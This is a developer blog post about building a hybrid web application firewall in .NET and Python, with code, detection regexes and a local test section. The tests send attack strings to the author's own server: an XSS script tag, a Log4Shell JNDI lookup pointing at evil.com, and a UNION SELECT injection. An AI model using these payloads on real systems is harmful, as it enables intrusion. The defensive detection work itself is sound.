DEV Community

Patryk


I Built a Hybrid WAF in C# and Python After 8 Months of Learning — Here's Everything I Learned

The Honest Truth First

I've been coding for 8 months. Not years. Eight months.

When I tell people what I built, they usually assume I'm exaggerating or that I just glued some libraries together. So let me be upfront: ShieldX is a fully custom Web Application Firewall combining a .NET 10 reverse proxy with a Python deep inspection engine, connected through a Redis event bus, with a real-time SOC dashboard powered by SignalR.

Is it perfect? No. Is it production-ready for a Fortune 500 company? Probably not yet. But it detects SQLi, XSS, Log4Shell, Command Injection, and Path Traversal, and it does so in under 5ms in standalone mode and under 10ms in hybrid mode. I'm proud of it, and I want to share exactly how it works and what I learned building it.


Why I Built This

I wasn't trying to reinvent Cloudflare. I wanted to understand how WAFs actually work under the hood. Every time I used tools like AWS WAF or ModSecurity, they felt like black boxes. Rules go in, traffic comes out filtered — but why? How?

So I decided to build one myself. From scratch.

The first version was a mess — a Python script with a handful of regex patterns that blocked anything with "SELECT" in it (which, embarrassingly, also blocked my own admin queries). Over the next few months, it evolved into something I'm genuinely proud of.


The Architecture — Two Engines, One System

The core idea behind ShieldX is simple: use the right tool for each job.

  • .NET 10 is incredibly fast for high-throughput request processing. It handles TLS, rate limiting, GeoIP filtering, URL anomaly detection, and caching. Sub-millisecond response times on the hot path.
  • Python is flexible and expressive for deep pattern matching. It handles POST/PUT body scanning — the kind of deep inspection where you need to decode URL-encoded payloads, strip encoding tricks, and run complex regex across request bodies.
  • Redis acts as the glue — a shared event bus and ban store that lets both engines communicate in real time.

Here's the high-level flow:

Incoming Request
      │
      ▼
.NET 10 Gateway (YARP / Kestrel)
  ├── GeoIP filtering (MaxMind)
  ├── Browser fingerprinting (SHA-256)
  ├── L7 URL/header anomaly detection
  ├── Rate limiting (30 req/10s)
  └── L1/L2 ban cache (IMemoryCache + Redis)
      │
      │ [Hybrid mode only]
      ▼
Python Intelligence Engine (FastAPI)
  ├── DPI body scan (POST/PUT up to 64KB)
  ├── SQLi, XSS, Log4Shell, CMDi detection
  ├── Threat scoring (0–100)
  └── Binary content guard (skips image/*, video/*, PDF)
      │
      ▼
Redis Event Bus
  ├── shieldx:bans:ip
  ├── shieldx:events:rate_limit
  └── shieldx:events:suspect
      │
      ▼
Real-time SOC Dashboard (SignalR)

There are two modes:

Feature             | Standalone (.NET)  | Hybrid (.NET + Python)
Setup               | Single process     | Two processes + Redis
Latency overhead    | Sub-millisecond    | ~2–5ms
Body scanning       |                    | ✓ POST/PUT up to 64KB
Log4Shell detection |                    |
Threat scoring      | Heuristic (0–100)  | Heuristic + Regex (0–100)
Rate limiting       | ✓ 30 req/10s       | ✓ 100 req/min sliding window

The .NET Gateway — Speed First

The .NET side uses YARP (Yet Another Reverse Proxy) as the foundation, running on Kestrel with TLS 1.2/1.3 enforced. I didn't want to write my own HTTP server — YARP handles the proxy mechanics, and I layered my WAF logic on top as ASP.NET middleware.

The Blocking Pipeline

Every request goes through this chain:

Whitelist → L1 Cache → Geo-IP → L7 Defense → [Python DPI] → Bot Score → Rate Limit → Allow

Whitelist — trusted IPs bypass everything. Useful for your own monitoring systems.

L1/L2 ban cache — this was a key performance decision. I use IMemoryCache as L1 (in-process, nanosecond lookups) and Redis as L2 (cross-node synchronization). On a cache hit, the request is rejected before any expensive logic runs.

// L1 cache check - fastest path
if (cache.TryGetValue($"ban:{ip}", out _))
{
    ctx.Response.StatusCode = 403;
    await ctx.Response.WriteAsJsonAsync(new
    {
        status = "BANNED",
        msg = "Your IP is blocked by Shield-X."
    });
    return;
}

Browser fingerprinting — I generate a SHA-256 fingerprint from a combination of headers (User-Agent, Accept-Language, Accept-Encoding, etc.). This catches bots that rotate IPs but keep the same browser signature. When the bot score hits 60, I ban the fingerprint. At 80, I ban both the fingerprint and the IP.
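
The fingerprint itself lives in the .NET gateway and isn't shown here, so the following is only a minimal Python sketch of the idea. The exact header set and the `browser_fingerprint` and `ban_targets` names are assumptions for illustration; only the SHA-256 hashing and the 60/80 thresholds come from the description above.

```python
import hashlib

# Assumed header set: the post names these three and then says "etc."
FINGERPRINT_HEADERS = ("user-agent", "accept-language", "accept-encoding")


def browser_fingerprint(headers: dict[str, str]) -> str:
    """Return a hex SHA-256 digest over a fixed, ordered set of request headers."""
    lowered = {name.lower(): value.strip() for name, value in headers.items()}
    # Newline-separated "name:value" pairs keep adjacent fields from running together.
    material = "\n".join(f"{name}:{lowered.get(name, '')}" for name in FINGERPRINT_HEADERS)
    return hashlib.sha256(material.encode("utf-8")).hexdigest()


def ban_targets(bot_score: int) -> set[str]:
    """Map a bot score to what gets banned, using the 60 and 80 thresholds."""
    if bot_score >= 80:
        return {"fingerprint", "ip"}
    if bot_score >= 60:
        return {"fingerprint"}
    return set()
```

Because only the listed headers feed the hash, a client that rotates its IP but sends the same header values keeps the same fingerprint.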

GeoIP — using MaxMind GeoLite2. Simple country-level blocking. Not the most sophisticated approach but effective for filtering out high-risk regions.

Redis Pub/Sub for Cross-Process Communication

When Python bans an IP, it publishes to shieldx:bans:ip. The .NET process has a subscriber running from startup:

await subscriber.SubscribeAsync(
    RedisChannel.Literal("shieldx:bans:ip"),
    async (_, msg) =>
    {
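        string ip = msg.ToString();
        // Read the stored reason; fall back when the key is missing or empty.
        RedisValue stored = await db.StringGetAsync($"shieldx:ban:{ip}");
        string reason = stored.IsNullOrEmpty
            ? "Python WAF detection"
            : stored.ToString();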

        cache.Set($"ban:{ip}", true, banDuration);
        await PushEvent("ban", ip, reason, score: 90);
    });

This means a ban applied by Python propagates to .NET's local cache within milliseconds — no polling, no delay.
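
For the publishing side, here is a rough Python sketch of what "Python bans an IP" could look like. The key and channel names come from this post. The `publish_ban` helper, the `RedisLike` protocol, and the one-hour TTL are assumptions for illustration, not the project's actual code. The client only needs `set(name, value, ex=...)` and `publish(channel, message)`, which redis-py's `Redis` client provides.

```python
from typing import Optional, Protocol


class RedisLike(Protocol):
    """The two client methods this sketch relies on (both exist on redis-py's Redis)."""

    def set(self, name: str, value: str, ex: Optional[int] = None): ...

    def publish(self, channel: str, message: str): ...


BAN_CHANNEL = "shieldx:bans:ip"


def publish_ban(client: RedisLike, ip: str, reason: str, ttl_seconds: int = 3600) -> None:
    """Store the ban reason, then notify subscribers. The TTL default is an assumption."""
    # Write the key first so the subscriber's follow-up lookup finds the reason.
    client.set(f"shieldx:ban:{ip}", reason, ex=ttl_seconds)
    # The message payload is just the IP, matching what the .NET subscriber reads.
    client.publish(BAN_CHANNEL, ip)
```

Writing the key before publishing matters because the subscriber reads `shieldx:ban:{ip}` as soon as the message arrives.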


The Python Engine — Intelligence Layer

The Python engine runs as a FastAPI ASGI application with a custom middleware class that intercepts every request before it reaches the route handler.

Why Python for This Layer?

I get asked this a lot. "Why not just do everything in C#?"

Regex in Python is fast, expressive, and the ecosystem for security pattern development is mature. I could have ported everything to C#, but for the DPI layer, I wanted the flexibility to iterate quickly on patterns without recompiling the .NET project every time. Python lets me hot-reload the detection engine independently.

Also — and this is the honest reason — I wanted to learn both languages deeply. Building a hybrid system forced me to think carefully about where each language excels.

Attack Detection Patterns

The most interesting part is the threat scoring system. Instead of binary block/allow, every request gets a score from 0 to 100:

ATTACK_PATTERNS: dict[str, tuple[int, str]] = {
    "SQL_INJECTION": (
        90,
        r"(?i)(\b(union\s+select|select\s+[\w\*]+\s+from|drop\s+table|"
        r"insert\s+into\s+\w+|update\s+\w+\s+set|delete\s+from|"
        r"xp_\w+|sp_\w+|waitfor\s+delay)\b|"
        # Alternatives ending in "(" or ")" sit outside the trailing \b, which
        # would otherwise require a word character right after the parenthesis.
        r"\b(?:exec|execute)\s*\(|\b(?:sleep\s*\(\d+\)|benchmark\s*\()|"
        r"--\s*$|/\*.*?\*/|'\s*(or|and)\s*'?\d|\bor\b\s+\d+=\d+)",
    ),
    "LOG4J": (
        100,
        r"(?i)\$\{(?:jndi|lower|upper|:+|-+)\s*:",
    ),
    # ... more patterns
}

Score thresholds:

  • ≥ 80 → immediate ban, event published to Redis
  • 40–79 → logged as suspect, forwarded to dashboard, request allowed
  • < 40 → clean, passes through

This gradation matters. A request with document.cookie in a query parameter isn't necessarily malicious; it might be a legitimate analytics tag. Logging it as suspicious without blocking gives you visibility without turning a false positive into a blocked user.
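
To make the thresholds concrete, here is a small sketch of how a score could be computed and mapped to an action. The LOG4J regex is copied from the table above; the SQLi regex is a shortened stand-in, and the `score_text` and `decide` names are hypothetical rather than ShieldX's real functions.

```python
import re

# Same shape as ATTACK_PATTERNS. The SQLi entry is a reduced stand-in for illustration.
PATTERNS: dict[str, tuple[int, str]] = {
    "LOG4J": (100, r"(?i)\$\{(?:jndi|lower|upper|:+|-+)\s*:"),
    "SQL_INJECTION": (90, r"(?i)\bunion\s+select\b|'\s*(?:or|and)\s*'?\d"),
}
COMPILED = {name: (score, re.compile(rx)) for name, (score, rx) in PATTERNS.items()}


def score_text(text: str) -> tuple[int, str]:
    """Return the highest score among matching patterns, or (0, "CLEAN")."""
    best = (0, "CLEAN")
    for name, (score, rx) in COMPILED.items():
        if score > best[0] and rx.search(text):
            best = (score, name)
    return best


def decide(score: int) -> str:
    """Apply the thresholds: >= 80 ban, 40-79 suspect, below 40 clean."""
    if score >= 80:
        return "ban"
    if score >= 40:
        return "suspect"
    return "clean"
```

With these two patterns, `decide(score_text("O'Brien")[0])` comes out as `"clean"`, while a `${jndi:...}` payload lands in `"ban"`.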

Body Scanning — The Hard Part

Reading the request body in ASGI middleware is tricky because once you consume the stream, it's gone. You need to buffer it and reconstruct it for the actual route handler:

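from fastapi import Request

MAX_BODY_READ_BYTES = 10 * 1024 * 1024  # 10MB read limit


async def analyze_request(request: Request) -> tuple[int, str, bytes]:
    chunks: list[bytes] = []
    total = 0

    # Buffer the body chunk by chunk while enforcing the size cap.
    async for chunk in request.stream():
        total += len(chunk)
        if total > MAX_BODY_READ_BYTES:
            # 999 is a sentinel outside the normal 0-100 scoring range.
            return 999, "BODY_TOO_LARGE", b""
        chunks.append(chunk)

    body_bytes = b"".join(chunks)

    # Scoring step, elided in this snippet. `score_body` is a placeholder name
    # for whatever runs ATTACK_PATTERNS over the decoded body.
    score, reason = score_body(body_bytes)

    # Reconstruct the stream for the next handler. `_receive` is a private
    # Starlette attribute, so this may need adjusting between versions.
    async def receive_patched():
        return {"type": "http.request", "body": body_bytes, "more_body": False}

    request._receive = receive_patched
    return score, reason, body_bytes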

I also skip body scanning for binary content types (image/*, video/*, application/pdf) — there's no point running regex on a JPEG.
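
A minimal sketch of that content-type guard might look like the following. The `should_scan_body` name and the choice to scan when no Content-Type is sent are assumptions; the skipped types are the ones listed above.

```python
from typing import Optional

SKIPPED_PREFIXES = ("image/", "video/")
SKIPPED_EXACT = {"application/pdf"}


def should_scan_body(content_type: Optional[str]) -> bool:
    """Return False for the binary media types that are skipped, True otherwise."""
    if not content_type:
        return True  # assumption: with no declared type, scan rather than skip
    # Drop parameters such as "; charset=utf-8" and normalise case.
    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type in SKIPPED_EXACT:
        return False
    return not media_type.startswith(SKIPPED_PREFIXES)
```

One design caveat: Content-Type is set by the client, so a guard like this trusts a header an attacker controls. Checking the first bytes of the body against the declared type would be a stricter variant.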


The Real-Time SOC Dashboard

The dashboard uses SignalR for WebSocket-based push events. Every ban, rate limit hit, or suspicious request appears in the live feed within milliseconds.

When Python detects an attack:

  1. It writes the ban to Redis (shieldx:ban:{ip})
  2. It publishes to shieldx:bans:ip channel
  3. .NET subscriber fires, updates its local cache
  4. .NET calls hubCtx.Clients.All.SendAsync("ShieldEvent", payload)
  5. Dashboard JavaScript receives the event and updates the UI

The whole chain — from Python detecting the attack to the dashboard showing the ban — takes under 50ms in practice.


Testing It — Live Attack Demo

Here's what the system looks like under actual attack traffic. I tested with curl from a local machine and from a separate device on the same network.

XSS Detection

curl -X POST http://localhost:8000/ \
  -H "Content-Type: text/plain" \
  -d "<script>alert(1)</script>"

Result:

{"status": "BLOCKED", "threat": "XSS", "score": 85}

Python log:

[SCAN] IP=192.168.1.179 PATH=/ BODY_SIZE=25B BINARY=False
[ERROR] [BLOCKED] 192.168.1.179 - XSS (score=85)
[WARNING] [BAN] 192.168.1.179 banned for: XSS

Log4Shell Detection

curl -X POST http://localhost:8000/ \
  -H "Content-Type: text/plain" \
  -d '${jndi:ldap://evil.com/x}'

Result:

{"status": "BLOCKED", "threat": "LOG4J", "score": 100}

Log4Shell gets score 100 — immediate ban, no questions asked.

SQL Injection

curl "http://192.168.1.45:8000/?id=1+UNION+SELECT+*+FROM+users--"

Result:

403 Forbidden
{"status": "BLOCKED", "threat": "SQL_INJECTION", "score": 90}

Rate Limiting

for i in $(seq 1 110); do curl -s http://localhost:8000/ > /dev/null; done

After 100 requests in 60 seconds:

429 Too Many Requests
{"status": "RATE_LIMITED", "msg": "Too many requests. Slow down."}
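
For readers who haven't built one, a sliding-window limiter with the 100 requests per 60 seconds behaviour shown above can be sketched in a few lines. This is an in-memory illustration only: the `SlidingWindowLimiter` class and its injectable clock are assumptions, not the engine's actual implementation.

```python
import time
from collections import defaultdict, deque
from typing import Callable


class SlidingWindowLimiter:
    """Allow at most `limit` requests per client in any `window` seconds."""

    def __init__(self, limit: int = 100, window: float = 60.0,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self.limit = limit
        self.window = window
        self.clock = clock  # injectable so the limiter can be tested without sleeping
        self.hits: dict[str, deque[float]] = defaultdict(deque)

    def allow(self, client: str) -> bool:
        now = self.clock()
        hits = self.hits[client]
        # Evict timestamps that have slid out of the window.
        while hits and now - hits[0] >= self.window:
            hits.popleft()
        if len(hits) >= self.limit:
            return False  # the caller would answer 429 here
        hits.append(now)
        return True
```

Unlike a fixed window that resets on a boundary, this keeps one timestamp per accepted request, so memory grows with `limit` per client. That is fine at 100 but worth knowing before raising the limit.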


What I Got Wrong (And Fixed)

False positives on apostrophes — my first SQLi pattern was too aggressive. A search query like O'Brien would trigger a block. I rewrote the patterns to require combinations of SQL keywords, not just individual characters.

Body stream consumption — early versions of the Python middleware consumed the body and never restored it. The actual application never received the POST data. The receive_patched pattern above was the fix.

Cache invalidation — when an IP gets unbanned via the REST API, I need to remove it from both Redis and the local IMemoryCache. Missing either one means the ban persists longer than intended.
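
The invalidation problem is easier to see in a toy model. In this sketch a plain dict stands in for Redis (L2) and a per-node dict stands in for IMemoryCache (L1). The `TwoTierBanStore` class is hypothetical, and TTLs are left out to keep it short.

```python
class TwoTierBanStore:
    """A per-node local cache (L1) in front of a shared store (L2)."""

    def __init__(self, shared: dict[str, str]) -> None:
        self.local: dict[str, str] = {}  # stands in for IMemoryCache
        self.shared = shared             # stands in for Redis

    def ban(self, ip: str, reason: str) -> None:
        self.shared[ip] = reason
        self.local[ip] = reason

    def is_banned(self, ip: str) -> bool:
        if ip in self.local:
            return True  # L1 hit, no round trip to the shared store
        reason = self.shared.get(ip)
        if reason is not None:
            self.local[ip] = reason  # promote to L1 for the next lookup
            return True
        return False

    def unban(self, ip: str) -> None:
        # Clear both tiers. Clearing only L1 would let the next lookup
        # re-promote the ban from the shared store.
        self.shared.pop(ip, None)
        self.local.pop(ip, None)
```

Note that `unban` only clears the L1 of the node that handled the call. Any other node that already cached the ban keeps it until its entry expires or it is told to drop it, for example through an unban message on the event bus.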

Loopback bypass — the .NET middleware skips all checks for loopback addresses (127.0.0.1). This is intentional for the dashboard and API endpoints, but it means you can't test attack detection from localhost — you need to come from an external IP.


Architecture Decisions I'd Make Differently

Single binary deployment — running two processes (Python + .NET) adds operational complexity. For a production deployment, I'd consider replacing the Python engine with a native .NET implementation using compiled regex, or packaging everything in a Docker Compose file with proper health checks.

GeoIP database — MaxMind requires registration and the database needs periodic updates. I'd automate this with a GitHub Action that refreshes the .mmdb file weekly.

Metrics — the current dashboard shows events but no aggregate metrics over time. I'd add a time-series store (InfluxDB or even just Redis sorted sets) to show attack trends, peak hours, and top attack sources.


What I Learned

Building ShieldX taught me more about web security in a few months than I'd learned in years of reading about it. A few specific things:

Regex is not enough. Pattern matching catches known signatures, but sophisticated attackers use encoding tricks, Unicode normalization, and payload fragmentation to evade simple regex. A production WAF needs semantic analysis, not just string matching.
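
As one small example of why, a payload that is percent-encoded twice slips past a pattern that only sees a single decode pass. The sketch below shows one possible normalization step to run before matching. The `normalize_payload` name and the three-round cap are assumptions, and this handles only a few of the tricks mentioned above.

```python
import html
import unicodedata
from urllib.parse import unquote_plus


def normalize_payload(raw: str, max_rounds: int = 3) -> str:
    """Undo layered URL and HTML-entity encoding, then fold Unicode look-alikes."""
    text = raw
    for _ in range(max_rounds):
        decoded = html.unescape(unquote_plus(text))
        if decoded == text:
            break  # nothing left to decode
        text = decoded
    # NFKC folds compatibility forms such as fullwidth letters to plain ASCII.
    return unicodedata.normalize("NFKC", text)
```

There is a trade-off here: decoding more rounds than the backend does can flag text the application would never interpret as markup or SQL, and `unquote_plus` turns a literal `+` into a space, which suits query strings and form bodies but not every content type.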

The performance gap between languages is real but manageable. The Python DPI layer adds 2–5ms per request. For most APIs, that's acceptable. For high-frequency trading or real-time gaming, it wouldn't be.

Redis is underrated as middleware. Using it as a pub/sub bus between two independent processes is clean and effective. The shieldx:bans:ip channel pattern made cross-language communication trivial.

Building something real teaches you what tutorials can't. Every bug I hit — the body stream consumption issue, the false positive patterns, the SignalR event name mismatch — taught me something that no course would have covered.


Source Code

The full source is on GitHub:


What's Next

  • [ ] Automated GeoIP database updates
  • [ ] ML-based anomaly detection (moving beyond regex)
  • [ ] Docker Compose packaging for easy deployment
  • [ ] Aggregate metrics dashboard with time-series data
  • [ ] HTTPS support with automatic Let's Encrypt certificates

Built in 8 months of learning. If you're early in your coding journey and wondering whether you're doing enough — just build something real. The bugs will teach you.


If you found this useful, drop a ❤️ or leave a comment. I'm always looking for feedback on what to improve.
